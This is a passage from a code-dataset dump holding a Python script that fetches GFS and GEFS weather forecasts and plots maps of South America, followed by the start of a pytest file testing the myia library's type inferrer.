"usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "numpy.argmin", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 94, "usage_type": "name"}]} +{"seq_id": "4760989", "text": "#!usr/bin/python\n\nfrom __future__ import print_function, division\nfrom datetime import datetime\nimport numpy as np\nfrom datetime import datetime, timedelta\nfrom netCDF4 import Dataset, num2date\nfrom siphon.catalog import TDSCatalog\nfrom siphon.ncss import NCSS\nimport matplotlib\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\n#plt.style.use('ncar_wrf_plots')\nplt.style.use('ggplot')\nfrom mpl_toolkits.basemap import Basemap\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nimport matplotlib.gridspec as gridspec\nfrom color_maker.color_maker import color_map\nfrom matplotlib import cm\nimport os\nfrom scipy.ndimage.filters import gaussian_filter\nfrom os import environ as EV\n\nos.chdir('/home/disk/meso-home/bzim/relampago')\n\ncormenlat = (-31.42,-32.89)\ncormenlon = (-64.18,-68.84)\nexportdir = '/home/disk/user_www/bzim/relampago'\nvariables_gfs = {'Precipitable_water_entire_atmosphere_single_layer' : ('Precipitable Water','mm','pwat',(0,35),'ncar_moist'),\n 'Precipitation_rate_surface_Mixed_intervals_Average' : ('Total Precipitation Rate','mm/hr','precip',(0,10), 'ncar_precip'),\n'Apparent_temperature_height_above_ground' : ('2m Temperature', 'degK', '2mtemp', (260, 312), 'ncar_temp'),\n'Relative_humidity_height_above_ground' : ('2m Relative Humidity', '%', '2mRH', (0, 100), 'MPL_RdBu'),\n'Convective_available_potential_energy_surface': ('Surface CAPE', 'J/Kg', 'cape', (0, 4000), 'ncar_ua')\n }\n\n# Spread variables need to have a range,\n# Mean variables need to have a tuple\nvariables_gefs = {'Convective_available_potential_energy_pressure_difference_layer_unweightedMean' :\n ('CAPE','J/kg','cape',(0,4000,100),'ncar_ua'),\n 'Convective_available_potential_energy_pressure_difference_layer_stdDev' :\n ('CAPE','J/kg','cape',np.arange(0,600), 'ncar_precip'),\n 'Total_precipitation_surface_6_Hour_Accumulation_unweightedMean' :\n ('6-hr Precipitation','mm','precip06',(0,30,1), 'ncar_precip'),\n 'Total_precipitation_surface_6_Hour_Accumulation_stdDev' :\n ('6-hr Precipitation','mm','precip06',np.arange(15), 'ncar_precip'),\n 'Pressure_reduced_to_MSL_msl_unweightedMean' :\n ('Sea-Level Pressure','hPa','slp',(940,1060, 4), 'ncar_precip'),\n 'Pressure_reduced_to_MSL_msl_stdDev' :\n ('Sea-Level Pressure Sprd',\n 'hPa','slp',np.arange(20),'WhBlGrYeRe'),\n 'Geopotential_height_isobaric_unweightedMean' :\n ('500 hPa Height','m','hgt500',(5400,6060, 60), 'ncar_precip'),\n 'Geopotential_height_isobaric_stdDev' :\n ('500 hPa Height Spread','m','hgt500',np.arange(30), 'ncar_precip'),\n 'Relative_humidity_height_above_ground_unweightedMean' :\n ('2m Relative Humidity', '%', '2mRH', (0, 100, 5), 'ncar_wv'),\n 'Relative_humidity_height_above_ground_stdDev' :\n ('2m Relative Humidity Spread', '%', '2mRH', np.arange(20), 'ncar_wv'),\n 'Temperature_height_above_ground_unweightedMean' :\n ('2m Temperature', 'degK', '2mtemp', (-15, 40, 1), 'ncar_temp'),\n 'Temperature_height_above_ground_stdDev' :\n ('2m Temperature Spread', 'degK', '2mtemp', np.arange(5), 'ncar_temp'),\n\n\n }\n\n\n\n\n\ndef get_gfs(type='hires', bounds=(-72.0, -54.5, -37.0, -26.25)):\n if type == 'hires':\n best_gfs = TDSCatalog('http://thredds.ucar.edu/thredds/catalog/grib/NCEP/GFS/Global_0p25deg/latest.xml')\n elif type=='ensemble':\n best_gfs = TDSCatalog('http://thredds.ucar.edu/thredds/catalog/grib/NCEP/GEFS/Global_1p0deg_Ensemble/derived/latest.xml')\n\n best_ds = list(best_gfs.datasets.values())[0]\n ncss = NCSS(best_ds.access_urls['NetcdfSubset'])\n query = ncss.query()\n # West east south north\n query.lonlat_box(*bounds)\n query.accept('netcdf4')\n query.time_range(datetime.utcnow(), datetime.utcnow()+timedelta(days=5))\n if type=='hires':\n query.variables(*((variables_gfs.keys())))\n elif type=='ensemble':\n query.variables(*((variables_gefs.keys())))\n data = ncss.get_data(query)\n return data\n\n\n\n\n\ndef get_terrain(terrfile='/home/disk/meso-home/bzim/relampago/geo_em.d01.nc'):\n \"\"\"\n Loads terrain height from WRF file\n \"\"\"\n from scipy.ndimage.filters import gaussian_filter\n from netCDF4 import Dataset\n with Dataset(terrfile,'r') as dset:\n lats = dset.variables['XLAT_M'][0]\n lons = dset.variables['XLONG_M'][0]\n hgt = dset.variables['HGT_M'][0]\n xhgt, yhgt = m(lons, lats)\n hgt = gaussian_filter(hgt, 1)\n return xhgt, yhgt, hgt\n\n\n# In[146]:\n\ndef make_plot(pltdat, export=False):\n gs = gridspec.GridSpec(2,2,height_ratios=(25,1))\n plt.figure(figsize=(10,8))\n plt.subplot(gs[0,:])\n\n if pltdat['pltcode'] == 'precip':\n pltdat['field'] = pltdat['field'] * 3600.0\n if pltdat['pltcode'] in ['slp','hgt500', 'hgt250', 'hgt925']:\n print(pltdat['field'].min(), pltdat['field'].max())\n print(pltdat['contourfield'].min(), pltdat['contourfield'].max())\n lw=2\n else:\n lw=2\n if pltdat['pltcode'] == '2mtemp':\n key = 'contourfield' if pltdat['modelname'] == 'GEFS' else 'field'\n pltdat[key] = pltdat[key]- 273.15\n\n if 'contourfield' in pltdat.keys():\n spreadfield = gaussian_filter(pltdat['contourfield'],1)\n lines = plt.contour(x,y,spreadfield, np.arange(pltdat['contourlevs'][0], pltdat['contourlevs'][1], pltdat['contourlevs'][2]), linewidths=lw, colors = 'k')\n clabels = plt.clabel(lines, fmt='%2.0f')\n\n if pltdat['modelname']=='GEFS':\n theplot = plt.pcolormesh(x,y,pltdat['field'], vmin=pltdat['range'][0], vmax=pltdat['range'][-1], cmap=color_map('WhBlGrYeRe'))\n elif pltdat['modelname']=='GFS':\n theplot = plt.pcolormesh(x,y,pltdat['field'], vmin=pltdat['range'][0], vmax=pltdat['range'][-1], cmap=pltdat['cmap'])\n # OLD theplot = plt.pcolormesh(x,y,pltdat['field'], vmin=pltdat['range'][0], vmax=pltdat['range'][1], cmap=pltdat['cmap'])\n # Highlight key sites\n plt.scatter(xpt, ypt, s=100, marker='s', facecolor='Firebrick', edgecolor='white')\n\n # Contour terrain\n if pltdat['plot terrain']:\n plt.contour(xhgt, yhgt, hgt, np.arange(500,4000,500), linewidths=1, colors='0.4')\n m.drawcoastlines(linewidth=2)\n m.drawcountries(linewidth=2)\n m.drawstates(linewidth=1, color='0.8')\n parallels = np.arange(-60,-5, 5)\n meridians = np.arange(-120,-30, 5)\n m.drawparallels(parallels,labels=[False,True,True,False])\n m.drawmeridians(meridians,labels=[True,False,True,False])\n\n tax = plt.subplot(gs[1,0])\n plt.text(0,0.75, '{modelname:s} {varname:s}'.format(**pltdat), fontsize=16, ha='left', va='center', transform=tax.transAxes)\n plt.text(0,0.00, 'Valid: {valid:%d %b %H00 UTC} | Init: {init:%d %b %H00 UTC}'.format(**pltdat), fontsize=12, ha='left', va='center', transform=tax.transAxes)\n plt.text(1.0, 0.75, 'F{flead:03d}'.format(**pltdat), fontsize=16, ha='right', va='center', transform=tax.transAxes)\n #plt.text(0,-0.75, 'Init: {init: %d %b %H00 UTC}'.format(**pltdat), fontsize=18, ha='left', va='center', transform=tax.transAxes)\n tax.axis('off')\n\n cax = plt.subplot(gs[1,1])\n cbar = plt.colorbar(theplot, cax=cax, orientation='horizontal')\n cbar.set_label(label='{varname:s} [{varunit:s}]'.format(**pltdat), fontsize=12)\n cax.tick_params(labelsize=18)\n plt.tight_layout()\n if export:\n outpath = '{:s}/{:s}/{:%Y%m%d%H}'.format(exportdir,pltdat['modelname'].lower(), pltdat['init'])\n filename = '{pltcode:s}_{valid:%Y%m%d%H}_f{flead:03d}.png'.format(**pltdat)\n\n # filenames for ftp files, add AR to the model name\n outpath2= EV['HOME']+'/relampago/ftp_gifs'\n filename2= 'model.{modelname:s}_AR.{init:%Y%m%d%H%M}.{flead:03d}_{pltcode:s}.png'.format(**pltdat)\n\n if not os.path.exists(outpath):\n os.system('mkdir {:s}'.format(outpath))\n\n plt.savefig(filename, bbox_inches='tight')\n os.system('mv {:s} {:s}'.format(filename, outpath))\n\n if not os.path.exists(outpath2):\n os.system('mkdir {:s}'.format(outpath2))\n print(filename2)\n plt.savefig(filename2, bbox_inches='tight')\n os.system('mv {:s} {:s}'.format(filename2, outpath2))\n os.system('convert {:s}/{:s} {:s}/{:s}'.format(outpath2, filename2, outpath2, filename2[:-3]+'gif'))\n os.system('rm {:s}/{:s}'.format(outpath2, filename2))\n plt.close()\n\n #from ftplib import FTP\n #ftp = FTP('catalog.eol.ucar.edu', 'anonymous', 'bzim@uw.edu')\n #ftp.cwd('pub/incoming/catalog/relampago')\n #with open('{:s}/{:s}'.format(outpath2, filename2) as f:\n # ftp.storbinary('STOR {:s}'.format(filename2), f)\n #ftp.quit()\n\n else:\n plt.show()\n\nif __name__ == '__main__':\n\n # now for the ensemble\n # Also get lat/lon bounds\n ensbounds = (-110.0, -46.0, -50.0, -11.0)\n m = Basemap(projection='merc', llcrnrlon=ensbounds[0],\n urcrnrlon=ensbounds[1], llcrnrlat=ensbounds[2],\n urcrnrlat=ensbounds[3], resolution='l', area_thresh=5000)\n\n #xhgt, yhgt, hgt = get_terrain()\n\n data = get_gfs(type='ensemble', bounds=ensbounds)\n glon, glat = np.meshgrid(data.variables['lon'][:]-360, data.variables['lat'][:])\n x,y = m(glon, glat)\n xpt, ypt = m(cormenlon, cormenlat)\n\n if 'time1' in data.variables.keys():\n timevar = 'time1'\n elif 'time2' in data.variables.keys():\n timevar = 'time2'\n elif 'time8' in data.variables.keys():\n timevar = 'time8'\n else:\n timevar = 'time'\n times = num2date(data.variables[timevar][:], units = data.variables[timevar].units)\n for n,time in enumerate(times):\n #if n !=0:\n # continue\n print(time)\n flead = data.variables[timevar][n]\n init = time - timedelta(hours=flead)\n print(init)\n #print(init)\n for fullvar, varcodes in variables_gefs.items():\n if fullvar.endswith('stdDev'):\n continue\n varpts = fullvar.split('_')\n varpts[-1] = 'stdDev'\n stdevvar = '_'.join(varpts)\n\n print(' ', varcodes[2])\n\n if varcodes[2] in ['slp']:\n # Contour the mean\n meanlevs = varcodes[3]\n varcodes = variables_gefs[stdevvar]\n plotdata = {\n 'field' : np.squeeze(data.variables[stdevvar][n]/100.0),\n 'contourfield' : np.squeeze(data.variables[fullvar][n]/100.0),\n 'contourlevs' : meanlevs,\n 'varname' : varcodes[0],\n 'varunit' : varcodes[1],\n 'modelname' : 'GEFS',\n 'cmap' : color_map(varcodes[4]),\n 'valid' : time,\n 'init' : init,\n 'flead' : int(flead),\n 'pltcode' : varcodes[2],\n 'range' : varcodes[3],\n 'plot terrain' : False,\n }\n make_plot(plotdata, export=True)\n\n elif varcodes[2].startswith('hgt'):\n #print(data.variables[fullvar])\n #import pdb; pdb.set_trace()\n for level in ['500']:\n try:\n isolevs = data.variables['isobaric1'][:]\n except:\n isolevs = data.variables['isobaric2'][:]\n thislev = int(level)*100\n hdex = np.argmax(isolevs >= thislev)\n #print(isolevs[hdex])\n #exit()\n # Contour the mean\n meanlevs = varcodes[3]\n varcodes = variables_gefs[stdevvar]\n plotdata = {\n 'field' : np.squeeze(data.variables[stdevvar][n, hdex]),\n 'contourfield' : np.squeeze(data.variables[fullvar][n, hdex]),\n 'contourlevs' : meanlevs,\n 'varname' : varcodes[0],\n 'varunit' : varcodes[1],\n 'modelname' : 'GEFS',\n 'cmap' : color_map(varcodes[4]),\n 'valid' : time,\n 'init' : init,\n 'flead' : int(flead),\n 'pltcode' : varcodes[2],\n 'range' : varcodes[3],\n 'plot terrain' : False,\n }\n \"\"\"plotdata = {\n 'field' : np.squeeze(data.variables[stdevvar][n,hdex]),\n 'contourfield' : np.squeeze(data.variables[fullvar][n,hdex]),\n 'contourlevs' : meanlevs,\n 'varname' : varcodes[0],\n 'varunit' : varcodes[1],\n 'modelname' : 'GEFS',\n 'cmap' : color_map(varcodes[4]),\n 'valid' : time,\n 'init' : init,\n 'flead' : int(flead),\n 'pltcode' : 'hgt' + level,\n 'range' : datarange,\n 'plot terrain' : False,\n }\"\"\"\n make_plot(plotdata, export=True)\n\n else:\n # Contour the mean\n meanlevs = varcodes[3]\n varcodes = variables_gefs[stdevvar]\n plotdata = {\n 'field' : np.squeeze(data.variables[stdevvar][n]),\n 'contourfield' : np.squeeze(data.variables[fullvar][n]),\n 'contourlevs' : meanlevs,\n 'varname' : varcodes[0],\n 'varunit' : varcodes[1],\n 'modelname' : 'GEFS',\n 'cmap' : color_map(varcodes[4]),\n 'valid' : time,\n 'init' : init,\n 'flead' : int(flead),\n 'pltcode' : varcodes[2],\n 'range' : varcodes[3],\n 'plot terrain' : False,\n }\n \"\"\"\n # Contour the stdev\n plotdata = {\n 'field' : np.squeeze(data.variables[fullvar][n]),\n 'contourfield' : np.squeeze(data.variables[stdevvar][n]),\n 'contourlevs' : variables_gefs[stdevvar][3],\n 'varname' : varcodes[0],\n 'varunit' : varcodes[1],\n 'modelname' : 'GEFS',\n 'cmap' : color_map(varcodes[4]),\n 'valid' : time,\n 'init' : init,\n 'flead' : int(flead),\n 'pltcode' : varcodes[2],\n 'range' : varcodes[3],\n 'plot terrain' : False,\n }\n \"\"\"\n make_plot(plotdata, export=True)\n\n\n # First, hires\n bounds=(-110.0, -46.0, -50.0, -11.0)\n m = Basemap(projection='merc', llcrnrlon=bounds[0], urcrnrlon=bounds[1], llcrnrlat=bounds[2], urcrnrlat=bounds[3], resolution='l', area_thresh=5000)\n\n xhgt, yhgt, hgt = get_terrain()\n data = get_gfs(type='hires', bounds=bounds)\n glon, glat = np.meshgrid(data.variables['lon'][:]-360, data.variables['lat'][:])\n x,y = m(glon, glat)\n xpt, ypt = m(cormenlon, cormenlat)\n\n if 'time1' in data.variables.keys():\n timevar = 'time1'\n elif 'time2' in data.variables.keys():\n timevar = 'time2'\n elif 'time8' in data.variables.keys():\n timevar = 'time8'\n else:\n timevar = 'time'\n\n times = num2date(data.variables[timevar][:], units = data.variables[timevar].units)\n for n,time in enumerate(times):\n #if n !=0:\n # continue\n print(time)\n flead = data.variables[timevar][n]\n init = time - timedelta(hours=flead)\n print(init)\n #print(init)\n for fullvar, varcodes in variables_gfs.items():\n print(' ', varcodes[2])\n plotdata = {\n 'field' : data.variables[fullvar][n].squeeze(),\n 'varname' : varcodes[0],\n 'varunit' : varcodes[1],\n 'modelname' : 'GFS',\n 'cmap' : color_map(varcodes[4]),\n 'valid' : time,\n 'init' : init,\n 'flead' : int(flead),\n 'pltcode' : varcodes[2],\n 'range' : varcodes[3],\n 'plot terrain' : True,\n }\n make_plot(plotdata, export=True)\n", "sub_path": "gfs_hires_plots.py", "file_name": "gfs_hires_plots.py", "file_ext": "py", "file_size_in_byte": 16405, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "matplotlib.use", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.style.use", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.style", "line_number": 14, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "os.chdir", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 62, "usage_type": "call"}, {"api_name": "siphon.catalog.TDSCatalog", "line_number": 73, "usage_type": "call"}, {"api_name": "siphon.catalog.TDSCatalog", "line_number": 75, "usage_type": "call"}, {"api_name": "siphon.ncss.NCSS", "line_number": 78, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 83, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 83, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 83, "usage_type": "call"}, {"api_name": "netCDF4.Dataset", "line_number": 101, "usage_type": "call"}, {"api_name": "scipy.ndimage.filters.gaussian_filter", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.gridspec.GridSpec", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.gridspec", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "scipy.ndimage.filters.gaussian_filter", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.contour", "line_number": 131, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 131, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 131, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.clabel", "line_number": 132, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 132, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.pcolormesh", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 135, "usage_type": "name"}, {"api_name": "color_maker.color_maker.color_map", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.pcolormesh", "line_number": 137, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 137, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 140, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 140, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.contour", "line_number": 144, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 144, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 149, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 153, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 153, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 154, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 154, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 155, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 155, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 156, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 156, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 160, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 160, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 161, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 161, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 164, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 164, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 170, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 173, "usage_type": "call"}, {"api_name": "os.path", "line_number": 173, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 174, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 176, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 176, "usage_type": "name"}, {"api_name": "os.system", "line_number": 177, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 179, "usage_type": "call"}, {"api_name": "os.path", "line_number": 179, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 180, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 182, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 182, "usage_type": "name"}, {"api_name": "os.system", "line_number": 183, "usage_type": "call"}, {"api_name": "os.system", "line_number": 184, "usage_type": "call"}, {"api_name": "os.system", "line_number": 185, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.close", "line_number": 186, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 186, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 196, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 196, "usage_type": "name"}, {"api_name": "mpl_toolkits.basemap.Basemap", "line_number": 203, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 210, "usage_type": "call"}, {"api_name": "netCDF4.num2date", "line_number": 222, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 228, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 245, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 246, "usage_type": "call"}, {"api_name": "color_maker.color_maker.color_map", "line_number": 251, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 270, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 277, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 278, "usage_type": "call"}, {"api_name": "color_maker.color_maker.color_map", "line_number": 283, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 313, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 314, "usage_type": "call"}, {"api_name": "color_maker.color_maker.color_map", "line_number": 319, "usage_type": "call"}, {"api_name": "mpl_toolkits.basemap.Basemap", "line_number": 350, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 354, "usage_type": "call"}, {"api_name": "netCDF4.num2date", "line_number": 367, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 373, "usage_type": "call"}, {"api_name": "color_maker.color_maker.color_map", "line_number": 383, "usage_type": "call"}]} +{"seq_id": "545487942", "text": "\nimport pytest\nimport operator\nimport numpy as np\n\nfrom types import SimpleNamespace\n\nfrom myia.pipeline import scalar_pipeline, standard_pipeline\nfrom myia.composite import hyper_add, zeros_like, grad, list_map, tail\nfrom myia.debug.traceback import print_inference_error\nfrom myia.dtype import Array as A, Int, Float, TypeType, External, \\\n Number, Class, Problem, EnvType as Env, JTagged as JT\nfrom myia.hypermap import HyperMap\nfrom myia.infer import ANYTHING, VOID, InferenceError, register_inferrer, \\\n Contextless, CONTEXTLESS\nfrom myia.ir import Graph, MultitypeGraph\nfrom myia.pipeline import pipeline_function\nfrom myia.prim import Primitive, ops as P\nfrom myia.dshape import TupleShape, ListShape, ClassShape, NOSHAPE\nfrom myia.prim.py_implementations import \\\n scalar_add, scalar_mul, scalar_lt, list_map as list_map_prim, \\\n hastype, typeof, scalar_usub, dot, distribute, shape, array_map, \\\n array_scan, array_reduce, reshape, partial as myia_partial, identity, \\\n bool_and, bool_or, switch, scalar_to_array, broadcast_shape, \\\n tuple_setitem, list_setitem, scalar_cast, list_reduce, \\\n env_getitem, env_setitem, embed, J, Jinv, array_to_scalar, \\\n transpose\nfrom myia.utils import RestrictedVar, newenv\n\nfrom .common import B, T, L, F, i16, i32, i64, u64, f16, f32, f64, \\\n li32, li64, lf64, ai16, ai32, ai64, af16, af32, af64, Nil, \\\n Point, Point_t, Point3D, Point3D_t, Thing, Thing_f, Thing_ftup, mysum\n\n\ndef t(tt):\n return {'type': tt}\n\n\ndef ai64_of(*shp):\n return {'type': ai64, 'shape': shp}\n\n\ndef ai32_of(*shp):\n return {'type': ai32, 'shape': shp}\n\n\ndef af64_of(*shp):\n return {'type': af64, 'shape': shp}\n\n\ndef af32_of(*shp):\n return {'type': af32, 'shape': shp}\n\n\ndef af16_of(*shp):\n return {'type': af16, 'shape': shp}\n\n\n########################\n# Temporary primitives #\n########################\n\n\npyimpl_test = {}\nvalue_inferrer_cons_test = {}\ntype_inferrer_cons_test = {}\nshape_inferrer_cons_test = {}\n\n\ndef _test_op(cls):\n import inspect\n op = Primitive(cls.__name__)\n nargs = len(inspect.getfullargspec(cls.impl).args)\n pyimpl_test[op] = cls.impl\n for method in dir(cls):\n pfx = 'infer_'\n if method.startswith(pfx):\n track = method[len(pfx):]\n if track == 'type':\n cons = type_inferrer_cons_test\n elif track == 'value':\n cons = value_inferrer_cons_test\n elif track == 'shape':\n cons = shape_inferrer_cons_test\n else:\n raise Exception(f'Unknown track to infer: {track}')\n inffn = getattr(cls, method)\n register_inferrer(op, nargs=nargs, constructors=cons)(inffn)\n return op\n\n\n# Ternary arithmetic op\n\n\n@_test_op\nclass _tern:\n def impl(x, y, z):\n return x + y + z\n\n async def infer_type(track, x, y, z):\n return await track.will_check((Int, Float), x, y, z)\n\n async def infer_shape(track, x, y, z):\n return NOSHAPE\n\n\n# Coercion\n\n\n@_test_op\nclass _to_i64:\n def impl(x):\n return int(x)\n\n async def infer_type(track, x):\n return Int[64]\n\n async def infer_shape(track, x):\n return NOSHAPE\n\n\n# Unification tricks\n\n\n@_test_op\nclass _unif1:\n def impl(x):\n return x\n\n async def infer_type(track, x):\n rv = RestrictedVar({i16, f32})\n return track.engine.loop.create_var(rv, None, 0)\n\n async def infer_shape(track, x):\n return NOSHAPE\n\n\n@_test_op\nclass _unif2:\n def impl(x):\n return x\n\n async def infer_type(track, x):\n rv = RestrictedVar({i16, f64})\n return track.engine.loop.create_var(rv, None, 0)\n\n async def infer_shape(track, x):\n return NOSHAPE\n\n\ninfer_pipeline = scalar_pipeline.select(\n 'parse', 'infer'\n).configure({\n 'py_implementations': pyimpl_test,\n 'inferrer.erase_value': False,\n 'inferrer.tracks.value.max_depth': 10,\n 'inferrer.tracks.value.constructors': value_inferrer_cons_test,\n 'inferrer.tracks.type.constructors': type_inferrer_cons_test,\n 'inferrer.tracks.shape.constructors': shape_inferrer_cons_test,\n})\n\n\ninfer_pipeline_std = standard_pipeline.select(\n 'parse', 'infer'\n).configure({\n 'py_implementations': pyimpl_test,\n 'inferrer.erase_value': False,\n 'inferrer.tracks.value.max_depth': 10,\n 'inferrer.tracks.value.constructors': value_inferrer_cons_test,\n 'inferrer.tracks.type.constructors': type_inferrer_cons_test,\n 'inferrer.tracks.shape.constructors': shape_inferrer_cons_test,\n})\n\n\ndef _is_exc_type(cls):\n return isinstance(cls, type) and issubclass(cls, Exception)\n\n\ndef parse_test_spec(tests_spec):\n\n tests = []\n\n for main_track, ts in tests_spec.items():\n if not isinstance(ts, list):\n ts = [ts]\n for t in ts:\n test = []\n for entry in t:\n if isinstance(entry, dict) or _is_exc_type(entry):\n test.append(entry)\n else:\n test.append({main_track: entry})\n tests.append((main_track, test))\n\n return tests\n\n\ndef inferrer_decorator(pipeline):\n def infer(**tests_spec):\n\n tests = parse_test_spec(tests_spec)\n\n def decorate(fn):\n def run_test(spec):\n main_track, (*args, expected_out) = spec\n\n print('Args:')\n print(args)\n\n required_tracks = [main_track]\n\n def out():\n pip = pipeline.configure({\n 'inferrer.required_tracks': required_tracks,\n })\n\n res = pip.make()(input=fn, argspec=args)\n rval = res['outspec']\n\n print('Output of inferrer:')\n print(rval)\n return rval\n\n print('Expected:')\n print(expected_out)\n\n if _is_exc_type(expected_out):\n try:\n out()\n except expected_out as e:\n if issubclass(expected_out, InferenceError):\n print_inference_error(e)\n else:\n pass\n else:\n raise Exception(\n f'Expected {expected_out}, got: (see stdout).'\n )\n else:\n try:\n assert out() == expected_out\n except InferenceError as e:\n print_inference_error(e)\n raise\n\n m = pytest.mark.parametrize('spec', list(tests))(run_test)\n m.__orig__ = fn\n return m\n\n return decorate\n\n return infer\n\n\ninfer = inferrer_decorator(infer_pipeline)\ninfer_std = inferrer_decorator(infer_pipeline_std)\n\n\ntype_signature_arith_bin = [\n (i64, i64, i64),\n (f64, f64, f64),\n (i64, f64, InferenceError),\n (B, B, InferenceError),\n]\n\n\ndef test_contextless():\n C = CONTEXTLESS\n assert Contextless.empty() is C\n assert C.filter(Graph()) is C\n assert C.add(Graph(), []) is C\n\n\n@infer(type=[(i64, i64)],\n value=[(89, 89), ([], TypeError)])\ndef test_identity(x):\n return x\n\n\n@infer(type=[(i64,)], value=[(16,)])\ndef test_constants_int():\n return 2 * 8\n\n\n@infer(type=[(f64,)], value=[(12.0,)])\ndef test_constants_float():\n return 1.5 * 8.0\n\n\n@infer(type=[(f64,)], value=[(12.0,)])\ndef test_constants_intxfloat():\n return 8 * 1.5\n\n\n@infer(type=[(f64,)], value=[(12.0,)])\ndef test_constants_floatxint():\n return 1.5 * 8\n\n\n@infer(type=type_signature_arith_bin)\ndef test_prim_mul(x, y):\n return x * y\n\n\n@infer(type=[\n (i64, i64, i64, i64),\n (f64, f64, f64, f64),\n # Three different inconsistent patterns below\n (f64, f64, i64, InferenceError),\n (i64, f64, f64, InferenceError),\n (f64, f64, i64, InferenceError),\n # Test too few/too many arguments below\n (i64, InferenceError),\n (i64, i64, i64, i64, InferenceError),\n])\ndef 